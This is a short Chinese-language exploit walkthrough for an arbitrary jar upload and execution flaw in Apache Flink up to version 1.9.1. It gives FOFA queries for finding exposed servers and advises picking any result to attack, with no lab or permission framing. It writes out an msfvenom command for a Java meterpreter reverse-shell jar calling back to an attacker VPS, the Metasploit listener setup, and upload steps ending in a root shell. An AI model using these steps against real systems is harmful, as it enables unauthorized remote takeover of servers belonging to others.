Apache Flink 任意jar檔案上傳+執行
阿新 • • 發佈:2020-11-23
01 描述
通過部署任意jar包的功能可直接向伺服器新增jar木馬檔案
02 影響範圍
<= 1.9.1
03 fofa語法
app="Apache-Flink"
app="Apache‐Flink" && country="CN"
04 漏洞復現
1.fofa搜尋關鍵字,隨便找一個點進去,選擇最下方的Submit New Job
2.使用msf生成jar格式木馬,LHOST為公網VPS地址
msfvenom ‐p java/meterpreter/reverse_tcp LHOST=**.***.***.** LPORT=44445 ‐f jar > 44445.jar
3. 公網開啟msf監聽
啟動msf框架
msfconsole
選擇handler模組
use exploit/multi/handler
設定監聽的ip和埠(和生成的木馬相對應) (程式碼中0.0.0.0表示監聽所有流向44445埠的流量) *注意payload不要選錯哦
set lhost 0.0.0.0
set lport 44445
set payload java/meterpreter/reverse_tcp
run或exploit開啟監聽
到此為止關於公網vps監聽就已經設定好了,等待上傳shell jar檔案的連線就好了
4.在apache flink中選擇Add New,選擇木馬jar檔案上傳
5.點選剛剛上傳的木馬檔案
6.選擇submit
7.這時候在返回公網vps發現已經接收到了反彈的meterpreter shell了,getuid檢視許可權為root許可權